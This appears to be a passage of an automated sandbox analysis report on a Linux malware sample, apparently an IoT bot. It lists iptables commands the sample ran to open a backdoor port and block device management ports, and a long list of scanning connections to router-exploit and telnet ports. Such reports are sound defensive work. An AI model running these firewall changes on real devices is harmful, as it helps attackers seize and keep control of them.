Source: global traffic	TCP traffic: 121.10.6.126 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 125.246.85.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 7.224.163.250 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 62.236.179.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 82.248.38.210 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 208.11.186.103 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 161.225.141.251 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 107.206.64.63 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.172.79.18 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 55.169.99.112 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 32.56.244.120 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.222.213.136 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 178.232.31.216 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 44.66.17.187 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 144.0.182.62 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 143.44.220.86 ports 2,5,6,8,9,52869

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4637)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 47166 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42672 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56268 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 56268
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.20:45402 -> 71.181.75.105:52869
Source: global traffic	TCP traffic: 192.168.2.20:34062 -> 168.27.245.114:49152
Source: global traffic	TCP traffic: 192.168.2.20:42054 -> 87.83.202.29:49152
Source: global traffic	TCP traffic: 192.168.2.20:39772 -> 137.88.31.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:38560 -> 219.143.155.172:37215
Source: global traffic	TCP traffic: 192.168.2.20:37806 -> 24.81.183.180:8080
Source: global traffic	TCP traffic: 192.168.2.20:52474 -> 71.11.190.90:37215
Source: global traffic	TCP traffic: 192.168.2.20:33166 -> 191.250.144.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:57236 -> 37.215.228.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:47640 -> 159.110.183.145:8443
Source: global traffic	TCP traffic: 192.168.2.20:48294 -> 205.51.33.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:49106 -> 103.102.254.14:81
Source: global traffic	TCP traffic: 192.168.2.20:58898 -> 204.189.67.153:81
Source: global traffic	TCP traffic: 192.168.2.20:53486 -> 164.142.55.184:52869
Source: global traffic	TCP traffic: 192.168.2.20:58446 -> 15.51.212.241:52869
Source: global traffic	TCP traffic: 192.168.2.20:33342 -> 7.224.163.250:37215
Source: global traffic	TCP traffic: 192.168.2.20:60706 -> 118.114.67.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:36038 -> 57.163.20.143:37215
Source: global traffic	TCP traffic: 192.168.2.20:44348 -> 193.22.15.210:81
Source: global traffic	TCP traffic: 192.168.2.20:47006 -> 94.185.176.145:49152
Source: global traffic	TCP traffic: 192.168.2.20:40084 -> 36.54.249.217:37215
Source: global traffic	TCP traffic: 192.168.2.20:44420 -> 160.226.225.149:8080
Source: global traffic	TCP traffic: 192.168.2.20:58870 -> 184.235.140.0:49152
Source: global traffic	TCP traffic: 192.168.2.20:46934 -> 130.140.7.168:52869
Source: global traffic	TCP traffic: 192.168.2.20:46600 -> 131.112.27.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:50512 -> 184.49.220.2:49152
Source: global traffic	TCP traffic: 192.168.2.20:41120 -> 166.216.172.210:8080
Source: global traffic	TCP traffic: 192.168.2.20:42878 -> 98.135.167.186:5555
Source: global traffic	TCP traffic: 192.168.2.20:49854 -> 2.99.233.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:51050 -> 50.192.24.84:52869
Source: global traffic	TCP traffic: 192.168.2.20:50412 -> 58.244.219.70:81
Source: global traffic	TCP traffic: 192.168.2.20:32830 -> 7.177.190.112:8080
Source: global traffic	TCP traffic: 192.168.2.20:43784 -> 134.67.11.73:37215
Source: global traffic	TCP traffic: 192.168.2.20:44900 -> 30.115.123.158:8443
Source: global traffic	TCP traffic: 192.168.2.20:60454 -> 51.78.124.189:81
Source: global traffic	TCP traffic: 192.168.2.20:49652 -> 212.212.35.40:8080
Source: global traffic	TCP traffic: 192.168.2.20:35566 -> 32.39.252.126:5555
Source: global traffic	TCP traffic: 192.168.2.20:36226 -> 92.69.32.77:5555
Source: global traffic	TCP traffic: 192.168.2.20:57598 -> 150.135.191.27:8080
Source: global traffic	TCP traffic: 192.168.2.20:54796 -> 89.138.225.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:36964 -> 218.161.66.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:34388 -> 34.89.63.52:7574
Source: global traffic	TCP traffic: 192.168.2.20:36622 -> 37.90.92.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:40676 -> 93.90.210.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:41186 -> 107.126.27.122:49152
Source: global traffic	TCP traffic: 192.168.2.20:39240 -> 103.85.14.140:8080
Source: global traffic	TCP traffic: 192.168.2.20:56124 -> 40.138.247.89:37215
Source: global traffic	TCP traffic: 192.168.2.20:51670 -> 8.12.234.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:48120 -> 90.83.4.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:42730 -> 165.66.227.31:49152
Source: global traffic	TCP traffic: 192.168.2.20:40102 -> 25.51.164.16:81
Source: global traffic	TCP traffic: 192.168.2.20:48710 -> 215.223.3.104:8443
Source: global traffic	TCP traffic: 192.168.2.20:52772 -> 140.112.93.27:5555
Source: global traffic	TCP traffic: 192.168.2.20:45486 -> 23.6.254.240:49152
Source: global traffic	TCP traffic: 192.168.2.20:37650 -> 94.18.108.108:37215
Source: global traffic	TCP traffic: 192.168.2.20:53028 -> 27.17.171.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:55848 -> 83.12.51.114:7574
Source: global traffic	TCP traffic: 192.168.2.20:54254 -> 75.82.66.140:49152
Source: global traffic	TCP traffic: 192.168.2.20:40446 -> 64.114.216.199:8443
Source: global traffic	TCP traffic: 192.168.2.20:35228 -> 97.155.241.217:81
Source: global traffic	TCP traffic: 192.168.2.20:41312 -> 207.155.33.174:81
Source: global traffic	TCP traffic: 192.168.2.20:51226 -> 57.185.135.155:7574
Source: global traffic	TCP traffic: 192.168.2.20:51886 -> 83.239.71.57:8080
Source: global traffic	TCP traffic: 192.168.2.20:56614 -> 212.172.120.97:81
Source: global traffic	TCP traffic: 192.168.2.20:39904 -> 132.221.174.139:8080
Source: global traffic	TCP traffic: 192.168.2.20:48760 -> 189.165.80.3:49152
Source: global traffic	TCP traffic: 192.168.2.20:46982 -> 62.236.179.84:49152
Source: global traffic	TCP traffic: 192.168.2.20:39964 -> 19.32.33.10:8080
Source: global traffic	TCP traffic: 192.168.2.20:38028 -> 2.96.223.8:52869
Source: global traffic	TCP traffic: 192.168.2.20:48660 -> 109.31.128.69:52869
Source: global traffic	TCP traffic: 192.168.2.20:44258 -> 60.210.62.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:51608 -> 189.24.15.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:36080 -> 143.157.186.149:49152
Source: global traffic	TCP traffic: 192.168.2.20:37974 -> 33.131.76.243:8080
Source: global traffic	TCP traffic: 192.168.2.20:32806 -> 213.66.171.50:5555
Source: global traffic	TCP traffic: 192.168.2.20:45062 -> 174.75.143.253:8080
Source: global traffic	TCP traffic: 192.168.2.20:38136 -> 125.47.115.66:8080
Source: global traffic	TCP traffic: 192.168.2.20:37988 -> 116.96.140.222:81
Source: global traffic	TCP traffic: 192.168.2.20:51768 -> 205.65.176.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:46330 -> 70.101.220.144:81
Source: global traffic	TCP traffic: 192.168.2.20:41050 -> 124.58.248.76:8080
Source: global traffic	TCP traffic: 192.168.2.20:59892 -> 93.89.24.103:8080
Source: global traffic	TCP traffic: 192.168.2.20:50658 -> 97.102.82.184:8443
Source: global traffic	TCP traffic: 192.168.2.20:57754 -> 47.24.59.44:8080
Source: global traffic	TCP traffic: 192.168.2.20:45324 -> 96.125.82.59:81
Source: global traffic	TCP traffic: 192.168.2.20:57666 -> 218.152.25.33:52869
Source: global traffic	TCP traffic: 192.168.2.20:39684 -> 57.102.106.47:8443
Source: global traffic	TCP traffic: 192.168.2.20:37290 -> 113.19.51.15:5555
Source: global traffic	TCP traffic: 192.168.2.20:50808 -> 40.92.162.99:7574
Source: global traffic	TCP traffic: 192.168.2.20:57416 -> 86.43.207.148:5555
Source: global traffic	TCP traffic: 192.168.2.20:56054 -> 106.161.219.27:81
Source: global traffic	TCP traffic: 192.168.2.20:55884 -> 163.184.153.227:8080
Source: global traffic	TCP traffic: 192.168.2.20:57918 -> 141.126.33.205:7574
Source: global traffic	TCP traffic: 192.168.2.20:52472 -> 116.221.170.83:49152
Source: global traffic	TCP traffic: 192.168.2.20:48092 -> 63.90.182.218:5555
Source: global traffic	TCP traffic: 192.168.2.20:47774 -> 7.21.198.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:49264 -> 217.176.48.194:5555
Source: global traffic	TCP traffic: 192.168.2.20:41198 -> 167.62.66.41:7574
Source: global traffic	TCP traffic: 192.168.2.20:34862 -> 100.16.3.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:57904 -> 76.8.208.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:48356 -> 83.49.243.21:5555
Source: global traffic	TCP traffic: 192.168.2.20:41776 -> 134.251.70.154:81
Source: global traffic	TCP traffic: 192.168.2.20:38232 -> 211.77.98.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:33816 -> 33.231.205.9:81
Source: global traffic	TCP traffic: 192.168.2.20:47970 -> 176.222.112.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:34336 -> 170.166.81.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:59896 -> 8.33.217.230:7574
Source: global traffic	TCP traffic: 192.168.2.20:39252 -> 48.177.79.80:8080
Source: global traffic	TCP traffic: 192.168.2.20:47010 -> 69.98.117.154:8080
Source: global traffic	TCP traffic: 192.168.2.20:51306 -> 107.82.103.68:81
Source: global traffic	TCP traffic: 192.168.2.20:60620 -> 114.207.0.228:49152
Source: global traffic	TCP traffic: 192.168.2.20:38214 -> 175.46.210.102:37215
Source: global traffic	TCP traffic: 192.168.2.20:46786 -> 195.19.159.232:81
Source: global traffic	TCP traffic: 192.168.2.20:59352 -> 16.197.247.12:49152
Source: global traffic	TCP traffic: 192.168.2.20:40358 -> 150.208.253.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:42084 -> 200.109.140.124:52869
Source: global traffic	TCP traffic: 192.168.2.20:56678 -> 112.15.3.127:5555
Source: global traffic	TCP traffic: 192.168.2.20:56346 -> 135.200.130.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:34610 -> 38.139.125.205:49152
Source: global traffic	TCP traffic: 192.168.2.20:38116 -> 115.221.72.54:49152
Source: global traffic	TCP traffic: 192.168.2.20:45314 -> 28.74.33.60:5555
Source: global traffic	TCP traffic: 192.168.2.20:51142 -> 114.83.134.162:37215
Source: global traffic	TCP traffic: 192.168.2.20:50068 -> 84.251.11.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:58762 -> 61.139.160.110:8443
Source: global traffic	TCP traffic: 192.168.2.20:42906 -> 36.231.186.108:7574
Source: global traffic	TCP traffic: 192.168.2.20:33294 -> 209.91.20.132:52869
Source: global traffic	TCP traffic: 192.168.2.20:54846 -> 32.56.244.120:49152
Source: global traffic	TCP traffic: 192.168.2.20:59996 -> 91.31.219.112:81
Source: global traffic	TCP traffic: 192.168.2.20:33264 -> 22.115.11.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:41658 -> 45.15.0.42:49152
Source: global traffic	TCP traffic: 192.168.2.20:35174 -> 66.225.40.228:7574
Source: global traffic	TCP traffic: 192.168.2.20:53400 -> 112.62.185.86:8080
Source: global traffic	TCP traffic: 192.168.2.20:47594 -> 158.6.58.6:8080
Source: global traffic	TCP traffic: 192.168.2.20:45558 -> 220.179.82.16:37215
Source: global traffic	TCP traffic: 192.168.2.20:42420 -> 101.205.175.231:81
Source: global traffic	TCP traffic: 192.168.2.20:34098 -> 44.66.17.187:37215
Source: global traffic	TCP traffic: 192.168.2.20:48334 -> 114.100.97.125:7574
Source: global traffic	TCP traffic: 192.168.2.20:56648 -> 56.103.247.65:81
Source: global traffic	TCP traffic: 192.168.2.20:49674 -> 59.150.94.42:8080
Source: global traffic	TCP traffic: 192.168.2.20:52518 -> 101.1.70.165:8080
Source: global traffic	TCP traffic: 192.168.2.20:47140 -> 203.63.207.193:52869
Source: global traffic	TCP traffic: 192.168.2.20:56190 -> 217.208.124.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:60212 -> 4.119.113.119:52869
Source: global traffic	TCP traffic: 192.168.2.20:60478 -> 135.233.240.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:48908 -> 211.64.237.240:52869
Source: global traffic	TCP traffic: 192.168.2.20:40858 -> 177.69.69.101:8080
Source: global traffic	TCP traffic: 192.168.2.20:39242 -> 163.101.185.176:5555
Source: global traffic	TCP traffic: 192.168.2.20:46542 -> 201.92.147.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:32940 -> 159.234.185.133:81
Source: global traffic	TCP traffic: 192.168.2.20:35358 -> 202.214.128.209:49152
Source: global traffic	TCP traffic: 192.168.2.20:50750 -> 109.222.251.31:8080
Source: global traffic	TCP traffic: 192.168.2.20:53646 -> 173.41.202.36:5555
Source: global traffic	TCP traffic: 192.168.2.20:53022 -> 90.27.43.235:8080
Source: global traffic	TCP traffic: 192.168.2.20:50932 -> 80.48.253.30:8080
Source: global traffic	TCP traffic: 192.168.2.20:40526 -> 155.4.179.213:37215
Source: global traffic	TCP traffic: 192.168.2.20:44066 -> 179.37.139.184:49152
Source: global traffic	TCP traffic: 192.168.2.20:58510 -> 97.158.222.212:7574
Source: global traffic	TCP traffic: 192.168.2.20:34640 -> 87.226.205.134:37215
Source: global traffic	TCP traffic: 192.168.2.20:52590 -> 39.143.29.32:8443
Source: global traffic	TCP traffic: 192.168.2.20:54138 -> 213.150.115.196:52869
Source: global traffic	TCP traffic: 192.168.2.20:35864 -> 203.41.82.213:5555
Source: global traffic	TCP traffic: 192.168.2.20:55284 -> 190.76.26.149:7574
Source: global traffic	TCP traffic: 192.168.2.20:39364 -> 77.121.111.66:5555
Source: global traffic	TCP traffic: 192.168.2.20:58206 -> 188.187.254.99:7574
Source: global traffic	TCP traffic: 192.168.2.20:34792 -> 30.103.130.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:39718 -> 99.183.96.40:49152
Source: global traffic	TCP traffic: 192.168.2.20:44044 -> 128.42.237.138:49152
Source: global traffic	TCP traffic: 192.168.2.20:43638 -> 84.10.4.162:8443
Source: global traffic	TCP traffic: 192.168.2.20:60674 -> 159.204.174.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:51916 -> 39.33.177.25:8080
Source: global traffic	TCP traffic: 192.168.2.20:42610 -> 125.246.85.252:52869
Source: global traffic	TCP traffic: 192.168.2.20:42772 -> 80.155.51.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:51712 -> 182.53.78.71:8080
Source: global traffic	TCP traffic: 192.168.2.20:39944 -> 57.22.136.117:5555
Source: global traffic	TCP traffic: 192.168.2.20:47454 -> 110.143.134.237:8443
Source: global traffic	TCP traffic: 192.168.2.20:37526 -> 66.168.225.187:8080
Source: global traffic	TCP traffic: 192.168.2.20:49332 -> 80.60.103.8:8080
Source: global traffic	TCP traffic: 192.168.2.20:42322 -> 54.133.252.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:56298 -> 90.106.68.161:5555
Source: global traffic	TCP traffic: 192.168.2.20:60010 -> 82.6.17.28:49152
Source: global traffic	TCP traffic: 192.168.2.20:45454 -> 5.253.248.89:5555
Source: global traffic	TCP traffic: 192.168.2.20:58228 -> 216.151.191.61:49152
Source: global traffic	TCP traffic: 192.168.2.20:55260 -> 59.27.22.152:5555
Source: global traffic	TCP traffic: 192.168.2.20:59266 -> 13.48.97.208:8080
Source: global traffic	TCP traffic: 192.168.2.20:45154 -> 71.163.189.157:52869
Source: global traffic	TCP traffic: 192.168.2.20:40666 -> 210.156.134.129:5555
Source: global traffic	TCP traffic: 192.168.2.20:52054 -> 178.232.31.216:49152
Source: global traffic	TCP traffic: 192.168.2.20:58536 -> 26.66.8.104:8443
Source: global traffic	TCP traffic: 192.168.2.20:45552 -> 29.161.161.202:37215
Source: global traffic	TCP traffic: 192.168.2.20:56202 -> 14.9.89.162:37215
Source: global traffic	TCP traffic: 192.168.2.20:35034 -> 47.116.0.88:8080
Source: global traffic	TCP traffic: 192.168.2.20:33424 -> 153.192.200.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:43688 -> 119.221.185.143:81
Source: global traffic	TCP traffic: 192.168.2.20:48322 -> 149.2.39.187:81
Source: global traffic	TCP traffic: 192.168.2.20:36866 -> 199.83.85.2:8443
Source: global traffic	TCP traffic: 192.168.2.20:45738 -> 8.195.49.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:54054 -> 20.118.177.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:51596 -> 211.90.22.130:52869
Source: global traffic	TCP traffic: 192.168.2.20:40030 -> 185.96.115.202:81
Source: global traffic	TCP traffic: 192.168.2.20:44914 -> 166.222.6.236:8443
Source: global traffic	TCP traffic: 192.168.2.20:54594 -> 210.154.170.145:8443
Source: global traffic	TCP traffic: 192.168.2.20:56846 -> 72.209.65.6:5555
Source: global traffic	TCP traffic: 192.168.2.20:35696 -> 107.206.64.63:49152
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 145.182.69.182:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 221.181.153.172:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 177.188.60.106:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 2.54.64.238:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 97.10.202.197:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 58.230.150.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.63.40.57:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 90.207.158.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 117.133.86.215:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 76.55.5.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 188.62.48.155:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 80.252.193.51:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 65.51.41.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 196.58.211.126:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 57.185.15.163:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 83.33.47.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 42.14.150.189:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 65.47.92.118:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 101.250.208.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 76.185.246.95:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 41.76.28.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.194.5.177:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 190.35.110.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 150.27.113.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 20.155.76.246:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 149.131.65.238:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 154.17.234.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 162.227.63.156:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 147.133.65.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 14.227.22.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 1.254.121.146:1023
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 143.6.32.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 176.231.61.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:38939 -> 160.197.208.150:2323
Source: global traffic	TCP traffic: 192.168.2.20:58728 -> 181.184.100.201:5555
Source: global traffic	TCP traffic: 192.168.2.20:48060 -> 84.48.141.104:52869
Source: global traffic	TCP traffic: 192.168.2.20:46438 -> 150.37.72.24:52869
Source: global traffic	TCP traffic: 192.168.2.20:51796 -> 213.6.140.69:8080
Source: global traffic	TCP traffic: 192.168.2.20:37058 -> 20.39.219.107:81
Source: global traffic	TCP traffic: 192.168.2.20:60698 -> 36.215.1.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:56426 -> 87.196.124.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:56038 -> 203.33.70.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:52674 -> 42.126.106.105:8080
Source: global traffic	TCP traffic: 192.168.2.20:52092 -> 26.80.202.172:52869
Source: global traffic	TCP traffic: 192.168.2.20:46258 -> 115.175.200.251:8080
Source: global traffic	TCP traffic: 192.168.2.20:38614 -> 169.108.144.27:5555
Source: global traffic	TCP traffic: 192.168.2.20:51460 -> 143.72.213.200:81
Source: global traffic	TCP traffic: 192.168.2.20:41802 -> 179.230.179.216:7574
Source: global traffic	TCP traffic: 192.168.2.20:43194 -> 73.105.97.89:81
Source: global traffic	TCP traffic: 192.168.2.20:55094 -> 122.144.5.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:57972 -> 193.118.213.59:49152
Source: global traffic	TCP traffic: 192.168.2.20:56050 -> 44.15.17.151:8080
Source: global traffic	TCP traffic: 192.168.2.20:54570 -> 3.24.235.217:8080
Source: global traffic	TCP traffic: 192.168.2.20:40390 -> 24.139.116.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:59268 -> 6.42.34.236:8080
Source: global traffic	TCP traffic: 192.168.2.20:35682 -> 107.100.37.172:8080
Source: global traffic	TCP traffic: 192.168.2.20:43186 -> 4.97.70.5:8443
Source: global traffic	TCP traffic: 192.168.2.20:38248 -> 112.31.181.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:35444 -> 106.35.192.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:47648 -> 45.102.94.126:7574
Source: global traffic	TCP traffic: 192.168.2.20:37882 -> 24.145.27.42:81
Source: global traffic	TCP traffic: 192.168.2.20:42216 -> 165.16.122.1:37215
Source: global traffic	TCP traffic: 192.168.2.20:39682 -> 27.20.114.90:37215
Source: global traffic	TCP traffic: 192.168.2.20:58278 -> 89.220.51.12:8080
Source: global traffic	TCP traffic: 192.168.2.20:51446 -> 11.163.212.152:5555
Source: global traffic	TCP traffic: 192.168.2.20:49398 -> 135.14.236.107:8080
Source: global traffic	TCP traffic: 192.168.2.20:34456 -> 119.138.58.232:7574
Source: global traffic	TCP traffic: 192.168.2.20:57300 -> 16.189.20.123:8443
Source: global traffic	TCP traffic: 192.168.2.20:54416 -> 60.147.4.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:50322 -> 63.156.222.43:8080
Source: global traffic	TCP traffic: 192.168.2.20:39482 -> 6.86.153.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:59164 -> 2.232.155.121:8080
Source: global traffic	TCP traffic: 192.168.2.20:60582 -> 215.96.13.140:8080
